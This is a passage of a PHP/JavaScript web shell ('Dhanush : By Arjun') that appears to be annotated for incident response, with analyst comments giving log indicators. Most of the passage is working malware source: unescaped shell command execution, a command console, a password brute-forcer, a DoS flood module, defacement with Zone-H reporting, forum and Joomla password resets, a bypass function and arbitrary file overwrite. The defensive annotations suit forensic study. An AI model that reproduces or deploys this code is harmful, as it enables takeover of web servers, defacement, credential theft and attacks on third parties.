     // Renders a permission form. The selected paths are echoed into hidden
     // actbox3[] inputs without HTML escaping.
4674 $actbox1 = $_POST['actbox'];
4675 foreach ($actbox1 as $myv)
4676 $myv = explode(",",$myv);
4677 foreach ($myv as $v)
4678 { ?>
4679 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4680 <?php }
4681 ?>
4682 <table align="center" border="3" style="width:40%; border-color:#333333;">
4683 <tr>
4684 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4685 </tr>
4686 <tr>
4687 <td colspan="2" align="center" style="height:60px">
4688 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4689 </tr>
4690 </table>
4691
4692 </form> <?php
4693 }
4694 else if($_POST['choice'] == "changefileperms")
4695 {
     // chmode only has to pass is_numeric(). The inner for loop converts the
     // digit string from octal by hand before calling chmod().
4696 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4697 {
4698 $actbox = $_POST["actbox"];
4699 foreach ($actbox as $myv)
4700 $myv = explode(",",$myv);
4701 foreach ($myv as $v)
4702 {
4703 if(is_file($v) || is_dir($v))
4704 {
4705 $perms = 0;
4706 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4707 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4708 echo "<div align=left style=width:60%;>";
4709 if(@chmod($v,$perms))
4710 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4711 else
4712 echo "Cannot Change $v File Permissions<br>";
4713 echo "</div>";
4714 }
4715 }
4716
4717 }
4718 }
4719 else if($_POST['choice'] == "compre")
4720 {
4721 $actbox = $_POST["actbox"];
4722 foreach ($actbox as $myv)
4723 $myv = explode(",",$myv);
4724 foreach ($myv as $v)
4725 {
4726 if(is_file($v))
4727 {
     // The archive is named basename($v).zip and opened relative to the current
     // working directory. addFile() is also given only the base name, and both
     // addFile() and close() run even when open() failed. The error string is
     // single-quoted, so "$v" is printed literally.
4728 $zip = new ZipArchive();
4729 $filename= basename($v) . '.zip';
4730 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4731 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4732 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4733 $zip->addFile(basename($v));
4734 $zip->close();
4735 }
4736 else if(is_dir($v))
4737 {
     // Directory case: the request-supplied path is concatenated unescaped into
     // a tar command line handed to execmd(), which is defined outside this
     // part of the file. A tar process whose parent is the web server or PHP
     // worker is a useful host-level indicator.
4738 if($os == "Linux")
4739 {
4740 $filename= basename($v);
4741 execmd("tar --create --recursion --file=$filename.tar $v");
4742 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4743 }
4744 }
4745 }
4746 }
4747 else if($_POST['choice'] == "uncompre")
4748 {
4749 $actbox = $_POST["actbox"];
4750 foreach ($actbox as $myv)
4751 $myv = explode(",",$myv);
4752 foreach ($myv as $v)
4753 {
4754 if(is_file($v) || is_dir($v))
4755 {
     // Opens basename($v) relative to the current working directory and
     // extracts into a directory named after the text before the first dot.
4756 $zip = new ZipArchive;
4757 $filename= basename($v);
4758 $res = $zip->open($filename);
4759 if ($res === TRUE)
4760 {
4761 $pieces = explode(".",$filename);
4762 $zip->extractTo($pieces[0]);
4763 $zip->close();
4764 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4765 } else
4766 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4767 }
4768 }
4769 }
4770}
4771else if(isset($_GET['sitename']))
4772{
     // Analyst note: strips "http://" and "www." from the sitename parameter and
     // appends the remainder, unescaped, to an "ls -la /etc/valiases/" command
     // line passed to myexe(). myexe() is defined outside this part of the file
     // and presumably runs a shell command (confirm against its definition).
     // The second str_replace() can never match because "http://" has already
     // been removed. Judging by the fallback message, the listing is used to
     // read the owning account name for a hosted domain.
     // Indicators: requests carrying ?sitename=, and an ls process on
     // /etc/valiases/ spawned by the web server user.
4773 $sitename = str_replace("http://","",$_GET['sitename']);
4774 $sitename = str_replace("http://www.","",$sitename);
4775 $sitename = str_replace("www.","",$sitename);
4776 $show = myexe("ls -la /etc/valiases/".$sitename);
4777 if(!empty($show))
4778 echo $show;
4779 else
4780 echo "Cannot get the username";
4781}
4782else if(isset($_GET['mydata']))
4783{
     // Analyst note: listdatabase() and mainfun() are defined outside this part
     // of the file; these branches only route request parameters to them.
4784 listdatabase();
4785}
4786else if(isset($_GET['home']))
4787{
4788 mainfun($_GET['home']);
4789}
4790else if(isset($_GET['dir']))
4791{
     // The branch is selected by the presence of "dir", but the path passed on
     // is the separate myfilepath parameter.
4792 mainfun($_GET['myfilepath']);
4793}
4794else if(isset($_GET['mydirpath']))
4795{
     // Reports whether an arbitrary request-supplied path is writable by the
     // PHP process. The page script calls this on every directory change, so
     // ?&mydirpath= requests recur in access logs while the file browser is in
     // use.
4796 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4797}
4798else
4799{
4800?>
4801<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4802<title>Dhanush : By Arjun</title>
4803<script type="text/javascript">
4804checked = false;
4805var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4806function checkedAll ()
4807{
4808 if (checked == false){checked = true}else{checked = false}
4809 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4810 {
4811 document.getElementById('myform').elements[i].checked = checked;
4812 }
4813}
4814function urlchange(myfilepath)
4815{
4816 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4817 splitter = "<?php echo addslashes($directorysperator); ?>";
4818 mypath = mpath = myfilepath.split(splitter);
4819 <?php if($os == "Linux") { ?>
4820 r = "/";
4821 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4822 <?php } ?>
4823 for (i = 0; i < mypath.length; i++)
4824 {
4825 if(mypath[i] == "")
4826 continue;
4827 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4828
4829 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4830 }
4831 myurl = myurl.replace(/\\/g,"\\\\");
4832 return myurl;
4833}
4834function wrtblDIR(mydirpath)
4835{
4836 var ajaxRequest;
4837 ajaxRequest = new XMLHttpRequest();
4838
4839 ajaxRequest.onreadystatechange = function()
4840 {
4841 if(ajaxRequest.readyState == 4)
4842 {
4843 for(i=0;i<=3;i++)
4844 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4845 }
4846 }
4847
4848 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4849 ajaxRequest.send(null);
4850}
4851function setpath(myfilpath)
4852{
4853 wrtblDIR(myfilpath);
4854 document.getElementById("path").value=myfilpath;
4855 document.getElementById("createfile").value=myfilpath;
4856 document.getElementById("createfolder").value=myfilpath;
4857 document.getElementById("createfolder").value=myfilpath;
4858 document.getElementById("exepath").value=myfilpath;
4859 document.getElementById("auexepath").value=myfilpath;
4860 document.getElementById("showdir").innerHTML="";
4861}
4862function changedir(myaction,myfilepath)
4863{
4864 var myurl = urlchange(myfilepath);
4865
4866 document.getElementById("showmaindata").innerHTML=waitstate;
4867 var ajaxRequest;
4868 ajaxRequest = new XMLHttpRequest();
4869
4870 ajaxRequest.onreadystatechange = function()
4871 {
4872 if(ajaxRequest.readyState == 4)
4873 {
4874 setpath(myfilepath);
4875 document.getElementById("crdir").innerHTML=myurl;
4876 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4877 }
4878 }
4879
4880 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4881 ajaxRequest.send(null);
4882}
4883function gethome(myaction,mydir)
4884{
4885 var myurl = urlchange(mydir);
4886 document.getElementById("showmaindata").innerHTML=waitstate;
4887 var ajaxRequest;
4888 ajaxRequest = new XMLHttpRequest();
4889
4890 ajaxRequest.onreadystatechange = function()
4891 {
4892 if(ajaxRequest.readyState == 4)
4893 {
4894 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4895 setpath(mydir);
4896 document.getElementById("crdir").innerHTML=myurl;
4897 }
4898 }
4899
4900 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4901 ajaxRequest.send(null);
4902}
4903function getname(sitename)
4904{
4905 document.getElementById("showsite").innerHTML=waitstate;
4906 var ajaxRequest;
4907 ajaxRequest = new XMLHttpRequest();
4908
4909 ajaxRequest.onreadystatechange = function()
4910 {
4911 if(ajaxRequest.readyState == 4)
4912 {
4913 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4914 }
4915 }
4916
4917 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4918 ajaxRequest.send(null);
4919}
4920function myaction(myfileaction,chmode)
4921{
     // Analyst note: client side of the bulk file actions. It collects the
     // checked actbox[] checkboxes and POSTs choice, chmode and actbox[] to the
     // script's own URL. The array is concatenated into the body as a string,
     // so all selected paths arrive comma-joined in one actbox[] value, which
     // is why the server-side "choice" handler splits on ",". Unchecked entries
     // leave holes in the array, which show up as empty items between commas.
     // No value is URL-encoded before sending.
4922 var mytype = document.getElementsByName('actbox[]');
4923 var mychoice = new Array();
4924
4925 for (var i = 0, length = mytype.length; i < length; i++)
4926 {
4927 if (mytype[i].checked)
4928 mychoice[i] = mytype[i].value;
4929 }
4930
4931 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4932
4933 document.getElementById("showdir").innerHTML=waitstate;
4934 var ajaxRequest;
4935 ajaxRequest = new XMLHttpRequest();
4936
4937 ajaxRequest.onreadystatechange = function()
4938 {
4939 if(ajaxRequest.readyState == 4)
4940 {
4941 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4942 }
4943 }
4944
4945 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4946 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4947 ajaxRequest.send(params);
4948}
4949function editdata()
4950{
4951 var result = "", // initialize list
4952 i,dbname,tablename;
4953 // iterate through arguments
4954 for (i = 1; i < arguments.length; i++)
4955 {
4956 if(i%2 == 0)
4957 result += arguments[i]+'=';
4958 else
4959 result += arguments[i]+'&';
4960 }
4961 result = result.slice(0, -1);
4962
4963 dbname = arguments[3];
4964 tablename = arguments[5];
4965 var result=result.replace(/dhanush_/g,"");
4966 var params = arguments[0]+"="+result;
4967
4968 document.getElementById("showsql").innerHTML=waitstate;
4969 var ajaxRequest;
4970 ajaxRequest = new XMLHttpRequest();
4971
4972 ajaxRequest.onreadystatechange = function()
4973 {
4974 if(ajaxRequest.readyState == 4)
4975 {
4976 viewtables('listTables',dbname,tablename);
4977 }
4978 }
4979
4980 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4981 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4982 ajaxRequest.send(params);
4983}
4984function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4985{
     // Analyst note: single entry point for the database browser. Every call
     // becomes a GET to the script's own URL with action, dbname, tablename,
     // a "<rowid>=<arrdata>" pair, executemyquery, fieldname and page.
     // Arguments the caller omits are concatenated as the literal text
     // "undefined", so UI-generated requests typically contain fragments such
     // as "&undefined=undefined" or "&executemyquery=undefined". That is a
     // distinctive pattern to search for in access logs. Free-text SQL typed
     // into the page's query box is sent in executemyquery, so it is recorded
     // in the request line as well.
     // The response is written to the page with innerHTML.
4986 document.getElementById("showsql").innerHTML=waitstate;
4987 var ajaxRequest;
4988 ajaxRequest = new XMLHttpRequest();
4989
4990 ajaxRequest.onreadystatechange = function()
4991 {
4992 if(ajaxRequest.readyState == 4)
4993 {
4994 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4995 }
4996 }
4997
4998 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
4999 ajaxRequest.send(null);
5000}
5001function mydatabase(server,username,password)
5002{
     // Analyst note: sends the database host, user name and password in the
     // query string of a GET request (?executeit&server=...&username=...
     // &password=...). The credentials the operator typed are therefore
     // recorded in clear text in web server access logs and in any proxy logs
     // on the path. Grep for "executeit&server=" during incident response, and
     // treat every password found there as compromised.
     // The server-side handler for "executeit" is not in this part of the
     // file. On completion the function calls mydatago() to load the database
     // list.
5003 document.getElementById("showsql").innerHTML=waitstate;
5004 var ajaxRequest;
5005 ajaxRequest = new XMLHttpRequest();
5006
5007 ajaxRequest.onreadystatechange = function()
5008 {
5009 if(ajaxRequest.readyState == 4)
5010 {
5011 mydatago();
5012 }
5013 }
5014
5015 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5016 ajaxRequest.send(null);
5017}
5018function mydatago()
5019{
5020 var ajaxRequest;
5021 ajaxRequest = new XMLHttpRequest();
5022
5023 ajaxRequest.onreadystatechange = function()
5024 {
5025 if(ajaxRequest.readyState == 4)
5026 {
5027 document.getElementById("datatable").style.display = 'none';
5028 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5029 }
5030 }
5031
5032 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5033 ajaxRequest.send(null);
5034}
5035function bruteforce(prototype,serverport,login,dict)
5036{
     // Analyst note: client side of the password-guessing form. It picks the
     // checked "mytype" radio button and the "reverse" checkbox, then issues one
     // GET to the script's own URL with prototype, serverport, login, dict, type
     // and reverse. The login and dictionary text are placed in the query string
     // unencoded, so they appear in the request line of access logs. Unusually
     // long URLs containing "prototype=" and "&dict=" are the indicator.
     // If no radio button is checked, i ends equal to mytype.length and
     // mytype[i].value throws before any request is sent.
     // The server-side handler is not in this part of the file.
5037 var mytype = document.getElementsByName('mytype');
5038 for (var i = 0, length = mytype.length; i < length; i++)
5039 {
5040 if (mytype[i].checked)
5041 break;
5042 }
5043 var getreverse = 0;
5044 if(document.getElementById('reverse').checked == true)
5045 getreverse = 1;
5046 else
5047 getreverse = 0;
5048
5049 document.getElementById("showbrute").innerHTML=waitstate;
5050 var ajaxRequest;
5051 ajaxRequest = new XMLHttpRequest();
5052
5053 ajaxRequest.onreadystatechange = function()
5054 {
5055 if(ajaxRequest.readyState == 4)
5056 {
5057 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5058 }
5059 }
5060
5061 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5062 ajaxRequest.send(null);
5063}
5064function executemyfile(action,executepath,execute)
5065{
5066 document.getElementById("showmaindata").innerHTML=waitstate;
5067 var ajaxRequest;
5068 ajaxRequest = new XMLHttpRequest();
5069
5070 ajaxRequest.onreadystatechange = function()
5071 {
5072 if(ajaxRequest.readyState == 4)
5073 {
5074 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5075 }
5076 }
5077
5078 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5079 ajaxRequest.send(null);
5080}
5081function maindata(myaction,dir)
5082{
5083 document.getElementById("showmaindata").innerHTML=waitstate;
5084 var ajaxRequest;
5085 ajaxRequest = new XMLHttpRequest();
5086
5087 ajaxRequest.onreadystatechange = function()
5088 {
5089 if(ajaxRequest.readyState == 4)
5090 {
5091 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5092 document.getElementById("showdir").innerHTML="";
5093 }
5094 }
5095
5096 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5097 ajaxRequest.send(null);
5098}
5099function manuallyscriptfn(passwd)
5100{
     // Analyst note: POSTs scriptlocator=scriptlocator and passwd to the
     // script's own URL and renders the reply with innerHTML. The URL-encoded
     // copy is stored in "message" and never used; the body is built from the
     // raw passwd value, so characters such as "&" or "+" reach the server
     // altered. The server-side "scriptlocator" handler is not in this part of
     // the file.
     // Log indicator: POST bodies beginning with scriptlocator=scriptlocator,
     // visible where request bodies are captured.
5101 var message = encodeURIComponent(passwd);
5102 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5103 document.getElementById("showdata").innerHTML=waitstate;
5104 var ajaxRequest;
5105 ajaxRequest = new XMLHttpRequest();
5106
5107 ajaxRequest.onreadystatechange = function()
5108 {
5109 if(ajaxRequest.readyState == 4)
5110 {
5111 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5112 }
5113 }
5114
5115 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5116 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5117 ajaxRequest.send(params);
5118}
5119function my404page(message)
5120{
5121 var message = encodeURIComponent(message);
5122 var params = "404page=404page&message="+message;
5123 document.getElementById("showdata").innerHTML=waitstate;
5124 var ajaxRequest;
5125 ajaxRequest = new XMLHttpRequest();
5126
5127 ajaxRequest.onreadystatechange = function()
5128 {
5129 if(ajaxRequest.readyState == 4)
5130 {
5131 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5132 }
5133 }
5134
5135 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5136 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5137 ajaxRequest.send(params);
5138}
5139function executemyfn(executepath,executemycmd)
5140{
     // Analyst note: sends executepath and executemycmd as GET parameters to
     // the script's own URL and writes the reply into the "showexecute"
     // element. Judging by the names this is the command console, but the
     // server-side handler is not in this part of the file. Because the
     // request is a GET, whatever was typed is recorded verbatim in the access
     // log. Requests containing "executemycmd=" give a timeline of operator
     // activity for incident reconstruction.
5141 document.getElementById("showexecute").innerHTML="Wait....";
5142 var ajaxRequest;
5143 ajaxRequest = new XMLHttpRequest();
5144
5145 ajaxRequest.onreadystatechange = function()
5146 {
5147 if(ajaxRequest.readyState == 4)
5148 {
5149 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5150 }
5151 }
5152
5153 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5154 ajaxRequest.send(null);
5155}
5156function zoneh(defacer,hackmode,reason,domain)
5157{
     // Analyst note: POSTs SendNowToZoneH=SendNowToZoneH with defacer,
     // hackmode, reason and domain to the script's own URL. Only domain is
     // URL-encoded. The server-side handler is not in this part of the file;
     // the parameter name suggests it reports a defacement to a third-party
     // archive (confirm against the handler).
     // Indicators: POST bodies containing "SendNowToZoneH" and, if the handler
     // makes the submission from the server, outbound HTTP from the web host
     // shortly afterwards.
5158 var domain = encodeURIComponent(domain);
5159 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5160 document.getElementById("showzone").innerHTML=waitstate;
5161 var ajaxRequest;
5162 ajaxRequest = new XMLHttpRequest();
5163
5164 ajaxRequest.onreadystatechange = function()
5165 {
5166 if(ajaxRequest.readyState == 4)
5167 {
5168 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5169 }
5170 }
5171
5172 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5173 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5174 ajaxRequest.send(params);
5175}
5176function savemyfile(file,content)
5177{
     // Analyst note: POSTs a file path ("file") and new contents ("content") to
     // the script's own URL. Only content is URL-encoded. The server-side
     // handler is not in this part of the file; the names indicate it
     // overwrites the given file with the posted text.
     // For triage, correlate POSTs to this script with modification times of
     // files under the web root, and compare those files against a known-good
     // copy or version control.
5178 var content = encodeURIComponent(content);
5179 var params = "content="+content+"&file="+file;
5180 document.getElementById("showmydata").innerHTML=waitstate;
5181 var ajaxRequest;
5182 ajaxRequest = new XMLHttpRequest();
5183
5184 ajaxRequest.onreadystatechange = function()
5185 {
5186 if(ajaxRequest.readyState == 4)
5187 {
5188 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5189 }
5190 }
5191
5192 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5193 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5194 ajaxRequest.send(params);
5195}
5196function renamefun(file,to)
5197{
5198 document.getElementById("showmydata").innerHTML=waitstate;
5199 var ajaxRequest;
5200 ajaxRequest = new XMLHttpRequest();
5201
5202 ajaxRequest.onreadystatechange = function()
5203 {
5204 if(ajaxRequest.readyState == 4)
5205 {
5206 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5207 }
5208 }
5209
5210 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5211 ajaxRequest.send(null);
5212}
5213function changeperms(chmode,myfilename)
5214{
5215 document.getElementById("showmydata").innerHTML=waitstate;
5216 var ajaxRequest;
5217 ajaxRequest = new XMLHttpRequest();
5218
5219 ajaxRequest.onreadystatechange = function()
5220 {
5221 if(ajaxRequest.readyState == 4)
5222 {
5223 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5224 }
5225 }
5226
5227 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5228 ajaxRequest.send(null);
5229}
5230function defacefun(deface)
5231{
     // Analyst note: issues GET ?deface=<value> to the script's own URL and
     // shows the reply in an alert box. The server-side handler is not in this
     // part of the file. The header of this file defines a base64 "deface
     // page" string in $ind, which that handler presumably writes out (confirm
     // against the handler).
     // Indicator: requests containing "?deface=" followed by changes to index
     // pages.
5232 var ajaxRequest;
5233 ajaxRequest = new XMLHttpRequest();
5234
5235 ajaxRequest.onreadystatechange = function()
5236 {
5237 if(ajaxRequest.readyState == 4)
5238 {
5239 alert(ajaxRequest.responseText);
5240 }
5241 }
5242
5243 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5244 ajaxRequest.send(null);
5245}
5246function fileaction(myaction,myfilepath)
5247{
5248 document.getElementById("showmydata").innerHTML=waitstate;
5249 var ajaxRequest;
5250 ajaxRequest = new XMLHttpRequest();
5251
5252 ajaxRequest.onreadystatechange = function()
5253 {
5254 if(ajaxRequest.readyState == 4)
5255 {
5256 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5257 }
5258 }
5259
5260 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5261 ajaxRequest.send(null);
5262}
5263function bypassfun(funct,functvalue,optiontype)
5264{
5265 document.getElementById("showbyp").innerHTML=waitstate;
5266 var ajaxRequest;
5267 ajaxRequest = new XMLHttpRequest();
5268
5269 ajaxRequest.onreadystatechange = function()
5270 {
5271 if(ajaxRequest.readyState == 4)
5272 {
5273 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5274 }
5275 }
5276
5277 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5278 ajaxRequest.send(null);
5279}
5280function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5281{
     // Analyst note: sends one GET to the script's own URL whose query string
     // starts with the bare "target" value, followed by ip, port, timeout,
     // exTime, multiplier and no0fBytes. The server-side handler is not in
     // this part of the file; the function and parameter names indicate a
     // traffic-flood module that uses the compromised host as the source.
     // Indicators: request lines containing "&exTime=" and "&no0fBytes=", and
     // a burst of outbound connections from the PHP worker to the logged
     // ip/port. Egress filtering on the web tier limits the impact.
5282 document.getElementById("showdos").innerHTML=waitstate;
5283 var ajaxRequest;
5284 ajaxRequest = new XMLHttpRequest();
5285
5286 ajaxRequest.onreadystatechange = function()
5287 {
5288 if(ajaxRequest.readyState == 4)
5289 {
5290 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5291 }
5292 }
5293
5294 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5295 ajaxRequest.send(null);
5296}
5297function createfile(filecreator,filecontent)
5298{
5299 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5300 var filecontent = encodeURIComponent(filecontent);
5301 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5302 document.getElementById("showdir").innerHTML=waitstate;
5303 var ajaxRequest;
5304 ajaxRequest = new XMLHttpRequest();
5305
5306 ajaxRequest.onreadystatechange = function()
5307 {
5308 if(ajaxRequest.readyState == 4)
5309 {
5310 gethome('home',mm);
5311 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5312 }
5313 }
5314
5315 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5316 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5317 ajaxRequest.send(params);
5318}
5319function createdir(create,createfolder)
5320{
5321 document.getElementById("showdir").innerHTML=waitstate;
5322 var ajaxRequest;
5323 ajaxRequest = new XMLHttpRequest();
5324
5325 ajaxRequest.onreadystatechange = function()
5326 {
5327 if(ajaxRequest.readyState == 4)
5328 {
5329 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5330 }
5331 }
5332
5333 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5334 ajaxRequest.send(null);
5335}
5336function codeinsert(code)
5337{
5338 var code = encodeURIComponent(code);
5339 var params = "getcode="+code;
5340 document.getElementById("showcode").innerHTML=waitstate;
5341 var ajaxRequest;
5342 ajaxRequest = new XMLHttpRequest();
5343
5344 ajaxRequest.onreadystatechange = function()
5345 {
5346 if(ajaxRequest.readyState == 4)
5347 {
5348 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5349 }
5350 }
5351
5352 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5353 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5354 ajaxRequest.send(params);
5355}
5356function getmydata(mydata)
5357{
5358 document.getElementById("showmydata").innerHTML=waitstate;
5359 var ajaxRequest;
5360 ajaxRequest = new XMLHttpRequest();
5361
5362 ajaxRequest.onreadystatechange = function()
5363 {
5364 if(ajaxRequest.readyState == 4)
5365 {
5366 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5367 }
5368 }
5369
5370 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5371 ajaxRequest.send(null);
5372}
5373function getdata(mydata,myfile)
5374{
5375 document.getElementById("showdata").innerHTML=waitstate;
5376 var ajaxRequest;
5377 ajaxRequest = new XMLHttpRequest();
5378
5379 ajaxRequest.onreadystatechange = function()
5380 {
5381 if(ajaxRequest.readyState == 4)
5382 {
5383 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5384 }
5385 }
5386
5387 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5388 ajaxRequest.send(null);
5389}
5390function getport(host,protocol,start,end)
5391{
5392 document.getElementById("showports").innerHTML=waitstate;
5393 var ajaxRequest;
5394 ajaxRequest = new XMLHttpRequest();
5395
5396 ajaxRequest.onreadystatechange = function()
5397 {
5398 if(ajaxRequest.readyState == 4)
5399 {
5400 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5401 }
5402 }
5403
5404 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5405 ajaxRequest.send(null);
5406}
5407function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5408{
5409 document.getElementById("showchangepass").innerHTML=waitstate;
5410 var ajaxRequest;
5411 ajaxRequest = new XMLHttpRequest();
5412
5413 ajaxRequest.onreadystatechange = function()
5414 {
5415 if(ajaxRequest.readyState == 4)
5416 {
5417 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5418 }
5419 }
5420
5421 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5422 ajaxRequest.send(null);
5423}
5424function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5425{
5426 var index = encodeURIComponent(index);
5427 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
